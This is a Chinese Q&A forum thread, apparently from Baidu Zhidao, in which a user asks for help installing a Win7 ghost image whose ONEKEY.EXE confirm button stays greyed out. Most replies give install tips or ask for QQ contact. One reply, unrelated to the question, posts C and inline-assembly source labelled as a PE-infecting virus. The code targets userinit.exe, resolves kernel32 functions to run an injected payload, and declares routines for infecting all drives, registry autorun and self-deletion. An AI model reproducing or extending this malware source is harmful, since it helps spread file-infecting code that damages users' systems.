雨木林风win7如何安装 50
直接上图:这是我下完系统解压出的文件,然后我打开ONEKEY。EXE出现但是这下面的确定是灰的,也就是点不了请问我如何在Ghost32打钩,打勾出现这种情况又改去哪里找这...
直接上图:
这是我下完系统解压出的文件,然后我打开ONEKEY。EXE出现
但是这下面的确定是灰的 ,也就是点不了 请问我如何在Ghost32打钩,打勾出现这种情况
又改去哪里找这Ghost32程序,或者我哪里步骤错了,求大神指导 ,在线等 展开
这是我下完系统解压出的文件,然后我打开ONEKEY。EXE出现
但是这下面的确定是灰的 ,也就是点不了 请问我如何在Ghost32打钩,打勾出现这种情况
又改去哪里找这Ghost32程序,或者我哪里步骤错了,求大神指导 ,在线等 展开
7个回答
名片
2024-10-28 广告
2024-10-28 广告
HyperWorks正版软件是由我们优菁科技(上海)有限公司代理的强大工程仿真软件套件。它集成了从产品设计、仿真分析到优化设计的全面工具集,支持多物理场耦合分析,帮助工程师解决复杂工程问题。HyperWorks提供高质量的建模、网格划分和仿...
点击进入详情页
本回答由名片提供
展开全部
我之前有过你这样的情况 只要把下载的系统和安装工具要放到非C盘的跟目录下。想你这个最好直接放到g盘下,而不是放到g盘下的mylf文件里面
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
第二张图下,点击盘符,下面的确定就会变为实体,再点击就开始安装了。
当然,基本上都是点击C盘盘符的。
当然,基本上都是点击C盘盘符的。
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
留下你的联系方式,我给你解决
追问
Q:1034821050 你可以加我 谢谢
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
//////////////////////////////////////////////////////////////////////////
//FileName: Virus
//Data: 2009-04-22
//Remark: PE感染型病毒代码
//////////////////////////////////////////////////////////////////////////
#pragma once
#include <stdio.h>
#include <Windows.h>
#pragma data_seg(".mydat")
#pragma code_seg(".shell")
#pragma const_seg(".constdata")
#pragma comment(linker,"/SECTION:.mydat,RWE")
#pragma comment(linker,"/SECTION:.shell,RWE")
#pragma comment(linker,"/SECTION:.constdata,RWE")
#pragma comment(linker,"/MERGE:.mydat=.shell")
#pragma comment(linker,"/MERGE:.constdata=.shell")
#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment(linker, "/subsystem:windows /entry:main")
//////////////////////////////////////////////////////////////////////////
//宏定义部分
//////////////////////////////////////////////////////////////////////////
//感染目标文件
#define TARGET "\\userinit.exe"
//感染标记
#define INFECTFLAG 19901117
//////////////////////////////////////////////////////////////////////////
//Payload 部分
//////////////////////////////////////////////////////////////////////////
//宏定义、函数声明部分
//此宏可实现代码重定位
#define RECODE(A) { _asm call A _asm A: _asm pop ebx _asm lea eax,A _asm sub ebx,eax }
//重定位字符串偏移
#define RecodeStrOffset(pStr) { _asm mov eax,[pStr] _asm lea eax,[ebx+eax] _asm mov pStr,eax }
#define RecodeVarOffset(dwGlovalVar,dwLocalVar) { _asm mov eax,[ebx+dwGlovalVar] _asm mov dwLocalVar,eax }
//动态搜索函数地址
void GetKernelFunc(void);
//核心payload
void ShellExcute(char* szDll,char* szFunc,char* szAction,char* szUrl);
//用于函数名比较
int FunCompare(char* str1,char* str2);
//Typedef 函数
typedef HINSTANCE (WINAPI *pLoadLibraryFunc)(LPCTSTR);
typedef DWORD (WINAPI *pShellExcuteFunc)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,INT);
//Payload 从这里开始
DWORD EntryPoint = 0;
char szShellExcute[] = "ShellExecuteA";
char szShell[] = "Shell32.dll";
char szKernel[] = "Kernel32.dll";
char szAction[] = "open";
char szUrl[] = "www.google.cn";
char szLoadLibrary[] = "LoadLibraryA";
char szGetProcAddress[] = "GetProcAddress";
DWORD dwLoadLibrary = 0;
DWORD dwGetProcAddress = 0;
void BeginPoint(void)
{
RECODE(A);
DWORD OldEntryPoint = 0;
RecodeVarOffset(EntryPoint,OldEntryPoint)
GetKernelFunc();
ShellExcute(szShell,szShellExcute,szAction,szUrl);
_asm{
jmp OldEntryPoint
}
}
//////////////////////////////////////////////////////////////////////////
//用于函数名比较
//////////////////////////////////////////////////////////////////////////
int FunCompare(char* str1,char* str2)
{
while ( *str1 && *str2 && *str1==*str2)
{
str1++;str2++;
}
return (*str1-*str2);
}
//////////////////////////////////////////////////////////////////////////
//获取Kernel32基地址,并搜索 LoadLibraryA() 和 GetProcAddress() 地址
//////////////////////////////////////////////////////////////////////////
void GetKernelFunc(void)
{
RECODE(A);
PBYTE pLoadLibrary = (PBYTE)szLoadLibrary;
PBYTE pGetProcAddress = (PBYTE)szGetProcAddress;
RecodeStrOffset(pLoadLibrary);
RecodeStrOffset(pGetProcAddress);
//获取Kernel32.dll的基地址
DWORD dwKernelBase = 0;
_asm{
mov eax,dword ptr fs:[30h]
mov eax,dword ptr [eax+0Ch]
mov esi,dword ptr [eax+1Ch]
lods dword ptr [esi]
mov eax,dword ptr [eax+08h]
mov dwKernelBase,eax
}
//Kernel32.dll的DOS头和PE头
IMAGE_DOS_HEADER *pHdr = (IMAGE_DOS_HEADER*)dwKernelBase;
IMAGE_NT_HEADERS *pNTHdr = (IMAGE_NT_HEADERS*)((PBYTE)dwKernelBase+pHdr->e_lfanew);
//数据目录项
IMAGE_DATA_DIRECTORY *pDatHdr = pNTHdr->OptionalHeader.DataDirectory;
//导出表
IMAGE_EXPORT_DIRECTORY *pEPTHdr = (IMAGE_EXPORT_DIRECTORY*)((PBYTE)dwKernelBase + pDatHdr->VirtualAddress);
//导出函数地址
DWORD* dwFunAdr = (DWORD*)((PBYTE)dwKernelBase + pEPTHdr->AddressOfFunctions);
DWORD* dwAdr = (DWORD*)((PBYTE)dwKernelBase + pEPTHdr->AddressOfNames);
DWORD dwFunc = 0;
//遍历出 LoadLibray() 和 GetProcAddress() 的地址
for (unsigned int i=0;i<pEPTHdr->NumberOfNames;i++)
{
if (FunCompare((char*)dwKernelBase+dwAdr[i],(char*)pLoadLibrary)==0)
{
dwFunc = dwFunAdr[i];
_asm{
RECODE(B)
mov eax,dwFunc
add eax,dwKernelBase
mov [ebx+dwLoadLibrary],eax
}
continue;
}
if (FunCompare((char*)dwKernelBase+dwAdr[i],(char*)pGetProcAddress)==0)
{
dwFunc = dwFunAdr[i];
_asm{
RECODE(C)
mov eax,dwFunc
add eax,dwKernelBase
mov [ebx+dwGetProcAddress],eax
}
}
}
}
//////////////////////////////////////////////////////////////////////////
//执行Shell,此函数可扩展
//////////////////////////////////////////////////////////////////////////
void ShellExcute(char* szDll,char* szFunc,char* szAction,char* szUrl)
{
RECODE(A);
char *pLocalDll = szDll;
RecodeStrOffset(szDll);
RecodeStrOffset(szFunc);
RecodeStrOffset(szAction);
RecodeStrOffset(szUrl);
//kernel32.dll BaseAddress : 0x7c800000.
DWORD LoadLibrary = 0x7c800000;
DWORD GetProcAddress = 0x7c800000;
RecodeVarOffset(dwLoadLibrary,LoadLibrary);
RecodeVarOffset(dwGetProcAddress,GetProcAddress);
HMODULE hDll = ((HMODULE(WINAPI*)(char*))LoadLibrary)(szDll);
PROC dwFunAddr = ((PROC(WINAPI*)(HMODULE,char*))GetProcAddress)(hDll,szFunc);
_asm{
mov eax,dwFunAddr
push 0
push 0
push 0
push szUrl
push szAction
push 0
call eax
}
}
///////////////////////////////////////////////////////////////////////////
//Payload在这里结束
//////////////////////////////////////////////////////////////////////////
void EndPoint(void){}
//////////////////////////////////////////////////////////////////////////
//函数声明部分
//////////////////////////////////////////////////////////////////////////
//感染指定文件
BOOL InfectFile(const char* fname);
//感染各驱动盘
BOOL InfectDriver(void);
//是否是正常PE文件
BOOL IsPeFile(PVOID pHdr);
//是否已被感染
BOOL IsInfected(PVOID pHdr);
//字节对齐
int Align(int size,int n);
//修改注册表,实现自动运行
BOOL SetAutorun(void);
//模拟打开盘符
BOOL OpenPath(void);
//自删除
BOOL SelfDelete(void);
//////////////////////////////////////////////////////////////////////////
//Main Function
//////////////////////////////////////////////////////////////////////////
int main(void)
{
//感染目标文件路径
char path[MAX_PATH] = {0};
//获取系统目录
GetSystemDirectory(path,MAX_PATH);
strcat(path,TARGET);
//感染目标文件
if (!InfectFile(path))
{
return 0;
}
//感染所有磁盘
InfectDriver();
//修改注册表,实现自动播放
SetAutorun();
//获取本程序路径
GetModuleFileName(NULL,path,MAX_PATH);
if (strlen(path) != strlen("X:\\Virus.exe"))
{
//自删除
SelfDelete();
return 0;
}
else
{
//模拟打开盘符
OpenPath();
}
//演示用对话框,读者可删
MessageBox(NULL,"I'm Virus","Virus",MB_OK);
return 0;
}
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
是不是差个Ghost啊啊
追问
我也不清楚 小白...
追答
我无语了~~~~~~~ 你QQ多少啊
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询